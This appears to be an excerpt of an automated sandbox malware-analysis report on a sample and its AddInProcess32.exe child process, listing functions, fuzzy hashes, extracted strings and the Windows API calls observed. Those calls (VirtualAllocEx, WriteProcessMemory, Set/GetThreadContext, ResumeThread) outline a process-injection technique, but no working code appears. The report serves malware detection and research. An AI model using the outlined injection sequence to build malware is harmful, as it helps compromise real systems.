Opcode ID: 054ca50fffb836b779aeda115acbabfdb79bce26548dba943561a7e8afdef0f2
Instruction ID: 9e84fc72be5329482b613492fdec16fe402f47f9af61bd15c79f7203bda63641
Opcode Fuzzy Hash: 054ca50fffb836b779aeda115acbabfdb79bce26548dba943561a7e8afdef0f2
Instruction Fuzzy Hash: C111F9B1E016189BDB18CF6B99002DEFAF7AFCD310F04C0BAD508A6224EB705A558E94

Uniqueness

Uniqueness Score: -1.00%

Function 0E7440B1 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2448435152.000000000E740000.00000040.00000800.00020000.00000000.sdmp, Offset: 0E740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e740000_2M1NS61GG8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5938338568599829957a01ddbd271f6a1dda5d1998c31696705c62f8bb04083b
Instruction ID: 01dbfd3a988ed6cf54fab33dfb722a1c3fe13c172971ee7e48c975c233b5c594
Opcode Fuzzy Hash: 5938338568599829957a01ddbd271f6a1dda5d1998c31696705c62f8bb04083b
Instruction Fuzzy Hash: C32117B1E056189BDB09CF6A89002DEBAF3AFC9310F04C0BAD448A6264EB714E51CF95

Uniqueness

Uniqueness Score: -1.00%

Function 08493689 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2438775780.0000000008490000.00000040.00000800.00020000.00000000.sdmp, Offset: 08490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8490000_2M1NS61GG8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd1618eaecbc7776c8e3daf185a292d4f090ed03f1eff22364a1974a1b75a0c7
Instruction ID: 620a2546e5e57d98eb9b391542fcf1441172d684b0bc8a9260c63a293f0500ef
Opcode Fuzzy Hash: fd1618eaecbc7776c8e3daf185a292d4f090ed03f1eff22364a1974a1b75a0c7
Instruction Fuzzy Hash: D121FE71E146088FEB18CF6B98446DEFBF3AFC9200F18C07AC458A6264EB3406468F11

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: AddInProcess32.exePID: 7600, Parent PID: 7272COMMON

Execution Graph

Execution Coverage:	19.7%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	96
Total number of Limit Nodes:	7

Executed Functions

Function 02664C88 Relevance: 21.5, Strings: 17, Instructions: 260
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

XX^q, xrefs: 026650F4
XX^q, xrefs: 0266505D
Xbq, xrefs: 02664CB7
TJcq, xrefs: 0266520A
TJcq, xrefs: 0266507C
TJcq, xrefs: 026651CE
TJcq, xrefs: 0266516D
TJcq, xrefs: 026651DE
$^q, xrefs: 02664C9E
TJcq, xrefs: 026651FA
TJcq, xrefs: 02665146
XX^q, xrefs: 0266525E
XX^q, xrefs: 0266526E
XX^q, xrefs: 02665284
XX^q, xrefs: 0266504D
XX^q, xrefs: 026650A1
XX^q, xrefs: 02665091

Memory Dump Source

Source File: 00000004.00000002.2475668679.0000000002660000.00000040.00000800.00020000.00000000.sdmp, Offset: 02660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2660000_AddInProcess32.jbxd

Similarity

API ID:
String ID: TJcq$TJcq$TJcq$TJcq$TJcq$TJcq$TJcq$XX^q$XX^q$XX^q$XX^q$XX^q$XX^q$XX^q$XX^q$Xbq$$^q
API String ID: 0-1094567813
Opcode ID: 0a3f1aa78b27b7e46425e684acadade72f659a788e5242e6172c3f4c0032fcca
Instruction ID: 081aa1bf800ebbc9ab23b030a8344da521d164169f56fcd9fcdaf691deaabd40
Opcode Fuzzy Hash: 0a3f1aa78b27b7e46425e684acadade72f659a788e5242e6172c3f4c0032fcca
Instruction Fuzzy Hash: 91816174B002188FDB19EB79885877E7BB7BBC8710F04892DE446E7398CE349C468792

Uniqueness

Uniqueness Score: -1.00%

Function 02667F98 Relevance: 12.2, Strings: 9, Instructions: 966COMMON

Download Yara Rule

Strings

(o^q, xrefs: 02668541
(o^q, xrefs: 026681F2
(o^q, xrefs: 02668601
,bq, xrefs: 026684D2
(o^q, xrefs: 0266806E
(o^q, xrefs: 02668551
(o^q, xrefs: 02668155
(o^q, xrefs: 02668129
,bq, xrefs: 026684E2

Memory Dump Source

Source File: 00000004.00000002.2475668679.0000000002660000.00000040.00000800.00020000.00000000.sdmp, Offset: 02660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2660000_AddInProcess32.jbxd

Similarity

API ID:
String ID: (o^q$(o^q$(o^q$(o^q$(o^q$(o^q$(o^q$,bq$,bq
API String ID: 0-2735749406
Opcode ID: bdb5d90f59a8397b55a60e40b043e179c1018dd4f905b44bbcb12d4f9fc75dd4
Instruction ID: 275c4536c4e70376443a22fcf075c3ba308b0e3f84c40e3ab67b11e8ef9a122a
Opcode Fuzzy Hash: bdb5d90f59a8397b55a60e40b043e179c1018dd4f905b44bbcb12d4f9fc75dd4
Instruction Fuzzy Hash: 66924A70A00209DFCB14CF69D988AAEBBF2FF88314F158559E415AB3A1D734ED89CB51

Uniqueness

Uniqueness Score: -1.00%

Function 02667380 Relevance: 8.4, Strings: 6, Instructions: 941COMMON

Download Yara Rule

Strings

,bq, xrefs: 02667C5A
Hbq, xrefs: 02667776
(o^q, xrefs: 02667BF0
(o^q, xrefs: 02667BE2
,bq, xrefs: 02667C68
(o^q, xrefs: 026678AA

Memory Dump Source

Source File: 00000004.00000002.2475668679.0000000002660000.00000040.00000800.00020000.00000000.sdmp, Offset: 02660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2660000_AddInProcess32.jbxd

Similarity

API ID:
String ID: (o^q$(o^q$(o^q$,bq$,bq$Hbq
API String ID: 0-56095411
Opcode ID: 1f23480095bfcb635b57b488d0cd4ea9c24daa6d0af283f724a98025bd35d7b8
Instruction ID: 36b6df53cd5931bb6d0e5b29c8b91d5e09f561f460467a07a7fea0830187a136
Opcode Fuzzy Hash: 1f23480095bfcb635b57b488d0cd4ea9c24daa6d0af283f724a98025bd35d7b8
Instruction Fuzzy Hash: 98827F70A002199FDB15DF69C898ABEBBF6FF88308F148569E405AB391DB34DD45CB90

Uniqueness

Uniqueness Score: -1.00%

Function 06E60B17 Relevance: 5.6, Instructions: 5647
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000004.00000002.2516823549.0000000006E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6e60000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c376752503c3d886d1badc49916339530821ea02c7b01903e8a0723bd5d0de8
Instruction ID: 719ea8a550747087a7a4fa8146278dbf4e9ba5667f94077ffbfef2426d0e49c3
Opcode Fuzzy Hash: 3c376752503c3d886d1badc49916339530821ea02c7b01903e8a0723bd5d0de8
Instruction Fuzzy Hash: 17C30A70E12219CFCB58FF39D99866DBBB2BB89204F4084E9D049A7354DB345E89CF46

Uniqueness

Uniqueness Score: -1.00%

Function 06E60B30 Relevance: 5.6, Instructions: 5633
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000004.00000002.2516823549.0000000006E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6e60000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fcbb5b3b84d72b9d1e7c5d0596ac3c32a9e1e5f2baabd69c3a5e2fd0e5ecdfdb
Instruction ID: 3673107fe8545c6167b05c2ad2d7421d794b5bc9430601dddd6b69c0917ec526
Opcode Fuzzy Hash: fcbb5b3b84d72b9d1e7c5d0596ac3c32a9e1e5f2baabd69c3a5e2fd0e5ecdfdb
Instruction Fuzzy Hash: E4C30A70E12219CFCB58FF39D99866DBBB2BB89204F4084E9D049A7354DB345E89CF46

Uniqueness

Uniqueness Score: -1.00%

Function 02665390 Relevance: 27.8, Strings: 22, Instructions: 270
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Te^q, xrefs: 02665666
Zcq, xrefs: 026654B0
P @, xrefs: 026653C0
Zcq, xrefs: 0266552D
Te^q, xrefs: 026655B3
Te^q, xrefs: 02665591
Zcq, xrefs: 026653F9
Zcq, xrefs: 0266555C
Zcq, xrefs: 02665779
Te^q, xrefs: 026655C1
Zcq, xrefs: 02665462
Zcq, xrefs: 026653E9
Zcq, xrefs: 0266554C
Zcq, xrefs: 02665431
Ycq, xrefs: 026655D0
Zcq, xrefs: 026654F2
Zcq, xrefs: 0266551E
Zcq, xrefs: 0266547E
Zcq, xrefs: 02665441
Ycq, xrefs: 02665584
Zcq, xrefs: 026654E2
Zcq, xrefs: 026654A0

Memory Dump Source

Source File: 00000004.00000002.2475668679.0000000002660000.00000040.00000800.00020000.00000000.sdmp, Offset: 02660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2660000_AddInProcess32.jbxd

Similarity

API ID:
String ID: P @$Te^q$Te^q$Te^q$Te^q$Ycq$Ycq$Zcq$Zcq$Zcq$Zcq$Zcq$Zcq$Zcq$Zcq$Zcq$Zcq$Zcq$Zcq$Zcq$Zcq$Zcq
API String ID: 0-1781777656
Opcode ID: 6c50b1e648d48a8df1b7a79cd8e1a0754fa23c70aa66c37b32338fd7952e8735
Instruction ID: 2946b997bb980faa0ac47f8834ad49ab26aa812c75079daf54c907f309fc9bcc
Opcode Fuzzy Hash: 6c50b1e648d48a8df1b7a79cd8e1a0754fa23c70aa66c37b32338fd7952e8735
Instruction Fuzzy Hash: 3FB1FF34B402088FCB08DF69C599ABEBBF6BF88711F608555D416AB3A8DB31DC45CB90

Uniqueness

Uniqueness Score: -1.00%

Function 02665000 Relevance: 10.2, Strings: 8, Instructions: 150
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

XX^q, xrefs: 026650F4
XX^q, xrefs: 0266504D
TJcq, xrefs: 0266507C
TJcq, xrefs: 026651CE
TJcq, xrefs: 0266516D
TJcq, xrefs: 026651FA
TJcq, xrefs: 02665146
XX^q, xrefs: 02665091

Memory Dump Source

Source File: 00000004.00000002.2475668679.0000000002660000.00000040.00000800.00020000.00000000.sdmp, Offset: 02660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2660000_AddInProcess32.jbxd

Similarity

API ID:
String ID: TJcq$TJcq$TJcq$TJcq$TJcq$XX^q$XX^q$XX^q
API String ID: 0-1072957671
Opcode ID: 5dc2b1daedfc27384e197035806fb4ea09bbfc6fe240627ad97399e58dc3df98
Instruction ID: c0d1e0e67fa7fc7cef556308001dffdcb9c6b214ea42a2dce1e14d3a2afec852
Opcode Fuzzy Hash: 5dc2b1daedfc27384e197035806fb4ea09bbfc6fe240627ad97399e58dc3df98
Instruction Fuzzy Hash: 48519D30B002058FD7289A69C59AB7ABBF6BF84314FA44469E403DB3A5DB31DC46CB91

Uniqueness

Uniqueness Score: -1.00%

Function 05B3FDF8 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 171
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindCloseChangeNotification.KERNELBASE(?), ref: 05B3FF80

Strings

Hbq, xrefs: 05B3FEDF
<R, xrefs: 05B3FECB
<R, xrefs: 05B3FEF0

Memory Dump Source

Source File: 00000004.00000002.2515031437.0000000005B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5b30000_AddInProcess32.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID: <R$<R$Hbq
API String ID: 2591292051-3764349655
Opcode ID: bc8cce441721f379c6d4ee6c8006e3ff0c60def27c40212b1f464ade007a074f
Instruction ID: 1f132d0fd1d75062f83296094ca3d8de5da46dd5e7f74733bd9042b4821b48eb
Opcode Fuzzy Hash: bc8cce441721f379c6d4ee6c8006e3ff0c60def27c40212b1f464ade007a074f
Instruction Fuzzy Hash: C551C172E046258FC714DF6DD4856AEBBF1FF88220B1445AAD419E77A1CB38EC45CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0266ACC0 Relevance: 4.0, Strings: 3, Instructions: 225
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Hbq, xrefs: 0266ADDA
Hbq, xrefs: 0266ADA7
4'^q, xrefs: 0266AE9B

Memory Dump Source

Source File: 00000004.00000002.2475668679.0000000002660000.00000040.00000800.00020000.00000000.sdmp, Offset: 02660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2660000_AddInProcess32.jbxd

Similarity

API ID:
String ID: 4'^q$Hbq$Hbq
API String ID: 0-1617668261
Opcode ID: a0ab3e300dc64270d7fdb19d8c762de50ba6a806a06f8ca0ecb426fc2eb39e53
Instruction ID: 4c34a63576e670d6270e8b6a7f90b6279275c44676f2ea83b773a05977bd1b52
Opcode Fuzzy Hash: a0ab3e300dc64270d7fdb19d8c762de50ba6a806a06f8ca0ecb426fc2eb39e53
Instruction Fuzzy Hash: 0A817975600254DFCB159FA8D998ABE7BA2FF88305F104469F946AB3A1CB34DC41CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0266B768 Relevance: 3.3, Strings: 2, Instructions: 769COMMON

Download Yara Rule

Strings

$^q, xrefs: 0266C28C
$^q, xrefs: 0266C2AF

Memory Dump Source

Source File: 00000004.00000002.2475668679.0000000002660000.00000040.00000800.00020000.00000000.sdmp, Offset: 02660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2660000_AddInProcess32.jbxd

Similarity

API ID:
String ID: $^q$$^q
API String ID: 0-355816377
Opcode ID: 493920958b03b37a2e276056515a9199637917609643a9250d9026e5fe728b77
Instruction ID: a9f0a44b865b6248a80496bdf9ad85436d459722fbf44542eef5dbc0cfbdf8e0
Opcode Fuzzy Hash: 493920958b03b37a2e276056515a9199637917609643a9250d9026e5fe728b77
Instruction Fuzzy Hash: 72628574A00218CFEB14DBA4C894BAEBBB6EF84300F1080A9D406BB3A5DF359D45DF51

Uniqueness

Uniqueness Score: -1.00%

Function 026669B8 Relevance: 2.9, Strings: 2, Instructions: 429COMMON

Download Yara Rule

Strings

Hbq, xrefs: 02666B89
Hbq, xrefs: 02666BBC

Memory Dump Source

Source File: 00000004.00000002.2475668679.0000000002660000.00000040.00000800.00020000.00000000.sdmp, Offset: 02660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2660000_AddInProcess32.jbxd

Similarity

API ID:
String ID: Hbq$Hbq
API String ID: 0-4258043069
Opcode ID: 3792ac4cac94911210d74af1d4db311cda902eb858b71582db4597013ba4e341
Instruction ID: 54c16181ab3d9a0238e5d9e1e4eb6736e7cc702606901d2adf7cd15fa9928a73
Opcode Fuzzy Hash: 3792ac4cac94911210d74af1d4db311cda902eb858b71582db4597013ba4e341
Instruction Fuzzy Hash: 80E19D307002159FDB05AF68E86877E7BAAEB88351F14846DE506DB391DF78DC42CB91

Uniqueness

Uniqueness Score: -1.00%

Function 026670F0 Relevance: 2.7, Strings: 2, Instructions: 238COMMON

Download Yara Rule

Strings

,bq, xrefs: 0266717E
,bq, xrefs: 02667188

Memory Dump Source

Source File: 00000004.00000002.2475668679.0000000002660000.00000040.00000800.00020000.00000000.sdmp, Offset: 02660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2660000_AddInProcess32.jbxd

Similarity

API ID:
String ID: ,bq$,bq
API String ID: 0-2699258169
Opcode ID: fcad97ffc3bbee58343cc32597bafb7dfda29191fc12e5f35d8b7b1a186ed8f8
Instruction ID: 6a5e198d4f0f536978f9730d9e4fbad9d3f8fb3e5fd352b8fd35cd44b9bce63f
Opcode Fuzzy Hash: fcad97ffc3bbee58343cc32597bafb7dfda29191fc12e5f35d8b7b1a186ed8f8
Instruction Fuzzy Hash: B9916F34A00605CFCB16DF69C898979F7B6FF89618F1981A9E805EB365D731EC41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 06E695A8 Relevance: 1.7, Strings: 1, Instructions: 447COMMON

Download Yara Rule

Strings

@, xrefs: 06E69A5C

Memory Dump Source

Source File: 00000004.00000002.2516823549.0000000006E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6e60000_AddInProcess32.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: a63e2628f95ad71d6a8ff1d2e103ba883daa2514bc0c73ef92f35f9ef6d6218e
Instruction ID: 479f83a2dfc251b3c5de9437ed07380d1bb9483ca87de14f4f78b324c9430a8f
Opcode Fuzzy Hash: a63e2628f95ad71d6a8ff1d2e103ba883daa2514bc0c73ef92f35f9ef6d6218e
Instruction Fuzzy Hash: F5D19170E152058FC704BFB9E59856DBBF2BF49244F4188A9E445EB392DE389C09CB52

Uniqueness

Uniqueness Score: -1.00%

Function 0719A7F0 Relevance: 1.7, APIs: 1, Instructions: 164processCOMMON

Download Yara Rule

APIs

CreateProcessAsUserW.KERNELBASE(?,?,?,0000000A,?,?,?,?,?,?,?), ref: 0719A95B

Memory Dump Source

Source File: 00000004.00000002.2517283614.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7190000_AddInProcess32.jbxd

Similarity

API ID: CreateProcessUser
String ID:
API String ID: 2217836671-0
Opcode ID: 0cc7847a1755c4f2bbf8da8bd59979facd59dba3b7261d3909f8580808408db3
Instruction ID: 4c395e9a28a71eaf9a82b1be3417fbe0bf0a2dcf3bb5810e44579690f1fba681
Opcode Fuzzy Hash: 0cc7847a1755c4f2bbf8da8bd59979facd59dba3b7261d3909f8580808408db3
Instruction Fuzzy Hash: C851F8B190022ADFCF25CF59C940BDDBBB5BF48310F0484AAE958B7250DB759A89CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0719CD08 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0719CD98

Memory Dump Source

Source File: 00000004.00000002.2517283614.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7190000_AddInProcess32.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 5c034221e0447bf4f473389eb5579f9db75d8a2b5a738ee0c27abb1d97b02733
Instruction ID: 1a74c31516bdfd99fa80c3b12588caa47c97e84b37323313445b24e01626fe92
Opcode Fuzzy Hash: 5c034221e0447bf4f473389eb5579f9db75d8a2b5a738ee0c27abb1d97b02733
Instruction Fuzzy Hash: A22155B59003199FCF10CFA9C985BDEBBF5FF48310F10842AE958A7240C7789945CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0719D488 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0719D506

Memory Dump Source

Source File: 00000004.00000002.2517283614.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7190000_AddInProcess32.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 0f435d57662f6e567c7db21d9ed3225ef055c434529ca2368690313f9a2e5ea2
Instruction ID: 3a8cc55f5aa5ec8d1fb1ea1a6eeeec771d77b4d4d8795aca1190008787154059
Opcode Fuzzy Hash: 0f435d57662f6e567c7db21d9ed3225ef055c434529ca2368690313f9a2e5ea2
Instruction Fuzzy Hash: B92118B1D003099FDB10DFAAC585BEEBBF4EF48324F148429D459A7241C778A945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0719C2C0 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64GetThreadContext.KERNEL32(?,00000000), ref: 0719C33E

Memory Dump Source

Source File: 00000004.00000002.2517283614.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7190000_AddInProcess32.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: d42bdb289eab35b15c82771e5b4a7d13abd3d71fb0f321762e40ac78fb5245a2
Instruction ID: c825e1e6fac9de0c4a8be3f3207ae07750ff32a6fca6bd2cc45d5f7cf8d2804c
Opcode Fuzzy Hash: d42bdb289eab35b15c82771e5b4a7d13abd3d71fb0f321762e40ac78fb5245a2
Instruction Fuzzy Hash: 842118B19003099FDB10DFAAC5857EEBBF4EF88324F148429D559A7240C7789945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0719D200 Relevance: 1.6, APIs: 1, Instructions: 60COMMON

Download Yara Rule

APIs

VirtualProtectEx.KERNELBASE(?,?,?,?,?), ref: 0719D277

Memory Dump Source

Source File: 00000004.00000002.2517283614.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7190000_AddInProcess32.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 3defdafc368e447bda356c92f5d5df2983fffdd74230787023973aa384e77820
Instruction ID: 58da05cdcbb59398b4c695aa5fed3dfc88b0d6f678bc613ed9e0831b4bd37350
Opcode Fuzzy Hash: 3defdafc368e447bda356c92f5d5df2983fffdd74230787023973aa384e77820
Instruction Fuzzy Hash: 8B2135B19003099FCB10DFAAC445BEEBBF5EF48320F10842AE459A7250C778A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 07720D28 Relevance: 1.6, APIs: 1, Instructions: 59fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE(00000000), ref: 07728F90

Memory Dump Source

Source File: 00000004.00000002.2520842285.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7720000_AddInProcess32.jbxd

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: d97ac30459653cea0fdebc80e051ff51ca6c999af30ede00120759d0efa22a35
Instruction ID: 84976fdee3f15d1a577ccc85d68335eb7995d178ef83df62b7f5ca2ab3987620
Opcode Fuzzy Hash: d97ac30459653cea0fdebc80e051ff51ca6c999af30ede00120759d0efa22a35
Instruction Fuzzy Hash: ED2147B1C0062A9BCB10DF9AC444BAEFBB4EB48320F108529E858B7244D338A940CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 071BAA50 Relevance: 1.6, APIs: 1, Instructions: 57memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 071BAACB

Memory Dump Source

Source File: 00000004.00000002.2517407272.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_71b0000_AddInProcess32.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 33cf9b5a8171bdadd53fcfb937cf9e06444c95dd42646de14509c225ba94a6e3
Instruction ID: cae009fac9c39f134f1d7682fd86248bb657bbf91556256296e2ad1221dd794c
Opcode Fuzzy Hash: 33cf9b5a8171bdadd53fcfb937cf9e06444c95dd42646de14509c225ba94a6e3
Instruction Fuzzy Hash: 5621F4B59002499FCB10CF9AC984BDEFBF5AF48320F10846AE598A7250D374A544CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 07193720 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 07193793

Memory Dump Source

Source File: 00000004.00000002.2517283614.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7190000_AddInProcess32.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 1a391e797f2d520166b368e14a9b2a1f3e57c71ec572644eef796fb2aec43d95
Instruction ID: 7c6013bbabc216d8bb797d998a83812bf594ced94510a7bc8a9a0efdb824685a
Opcode Fuzzy Hash: 1a391e797f2d520166b368e14a9b2a1f3e57c71ec572644eef796fb2aec43d95
Instruction Fuzzy Hash: EE2114B59002499FCB10CF9AC584BDEFBF4FB48320F108429E858A7250D378A545CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 071BAA58 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 071BAACB

Memory Dump Source

Source File: 00000004.00000002.2517407272.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_71b0000_AddInProcess32.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 769fd69286db17242672d33bbf35a0e7582c838342bfb1674e9abca9c6963aed
Instruction ID: e48f7d0c416a0e9823671f61cdcf87c8b1df4c21509cc399c1f704321e35aebe
Opcode Fuzzy Hash: 769fd69286db17242672d33bbf35a0e7582c838342bfb1674e9abca9c6963aed
Instruction Fuzzy Hash: 2A21E4B59002599FCB10DF9AC984BDEFBF4FF48320F10842AE958A7250D378A544CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0719C990 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0719C9FE

Memory Dump Source

Source File: 00000004.00000002.2517283614.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7190000_AddInProcess32.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 064b46bb3952eba2f134ddd0516bab050287e892360db870345ee4b8cb09e5a4
Instruction ID: 76a9d09aa32da4dea11508f922825fe4b1c11d36b8f28a604ae459c45e09d368
Opcode Fuzzy Hash: 064b46bb3952eba2f134ddd0516bab050287e892360db870345ee4b8cb09e5a4
Instruction Fuzzy Hash: A91137B19002499FCB10DFAAC845BDEBFF5EF88324F108829E559A7250C775A544CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0719D710 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 0719D772

Memory Dump Source

Source File: 00000004.00000002.2517283614.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7190000_AddInProcess32.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: a5d3e0be57b5e0c214d2d78da56e3c4b7229d6b02b27dab529f429462058b591
Instruction ID: 04f551b74bef224eba95c0c856f3a63437593ba9d2f22961271acf0ac65742f7
Opcode Fuzzy Hash: a5d3e0be57b5e0c214d2d78da56e3c4b7229d6b02b27dab529f429462058b591
Instruction Fuzzy Hash: 9F1155B19002498BCB20DFAAC4457DEFBF4AB88324F208829C459A7250CB74A944CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 07193688 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 0719DDBD

Memory Dump Source

Source File: 00000004.00000002.2517283614.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7190000_AddInProcess32.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: cb8f74fb32d62326dcdd4682102b9f2d6b1a48fe3574cd7658dfc0e6c402c94b
Instruction ID: edd83368a8200c8b81672593363f6506289d26efb82dc9598d137ad83e23b308
Opcode Fuzzy Hash: cb8f74fb32d62326dcdd4682102b9f2d6b1a48fe3574cd7658dfc0e6c402c94b
Instruction Fuzzy Hash: EC1122B59003499FDB20DF9AD588BEEBBF8EB48320F108419E598A7240C375A940CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 06E6B818 Relevance: 1.5, Strings: 1, Instructions: 264COMMON

Download Yara Rule

Strings

4'^q, xrefs: 06E6B973

Memory Dump Source

Source File: 00000004.00000002.2516823549.0000000006E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6e60000_AddInProcess32.jbxd

Similarity

API ID:
String ID: 4'^q
API String ID: 0-1614139903
Opcode ID: 419ba9b497bf984f5083ce833bb2c6fda171d884eeebc5c3a1fc35fc26216f5a
Instruction ID: 90c476528ca8c7d32e13a08147334db41264164ed13f86357efc49902fc8de83
Opcode Fuzzy Hash: 419ba9b497bf984f5083ce833bb2c6fda171d884eeebc5c3a1fc35fc26216f5a
Instruction Fuzzy Hash: 5D919E30B14205CFC704FFBAD59866EB7B6FB88644F808468E449EB358DE389D15C7A6

Uniqueness

